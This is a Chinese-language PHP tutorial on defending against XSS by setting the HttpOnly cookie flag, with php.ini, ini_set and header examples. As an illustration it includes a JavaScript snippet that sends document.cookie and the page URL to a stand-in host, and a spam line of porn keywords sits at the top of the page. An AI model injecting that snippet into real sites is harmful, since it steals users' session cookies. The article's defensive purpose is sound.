欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

xss防御之php利用httponly防xss攻擊

 更新時間:2014年03月21日 16:24:02   作者:  
這篇文章主要介紹了xss防御之php利用httponly防xss攻擊,下面是PHP設(shè)置HttpOnly的方法,需要的朋友可以參考下

xss的概念就不用多說了,它的危害是極大的,這就意味著一旦你的網(wǎng)站出現(xiàn)xss漏洞,就可以執(zhí)行任意的js代碼,最可怕的是攻擊者利用js獲取cookie或者session劫持,如果這里面包含了大量敏感信息(身份信息,管理員信息)等,那完了。。。

如下js獲取cookie信息:

復(fù)制代碼 代碼如下:

url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是從document對象中獲取的,現(xiàn)在瀏覽器在設(shè)置Cookie的時候一般都接受一個叫做HttpOnly的參數(shù),跟domain等其他參數(shù)一樣,一旦這個HttpOnly被設(shè)置,你在瀏覽器的document對象中就看不到Cookie了。

PHP設(shè)置HttpOnly

復(fù)制代碼 代碼如下:

//在php.ini中,session.cookie_httponly = ture 來開啟全局的Cookie的HttpOnly屬性
ini_set("session.cookie_httponly", 1);

//或者setcookie()的第七個參數(shù)設(shè)置為true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

對于PHP5.1以前版本的PHP通過:

復(fù)制代碼 代碼如下:

header("Set-Cookie: hidden=value; httpOnly");

最后,HttpOnly不是萬能的!

相關(guān)文章

最新評論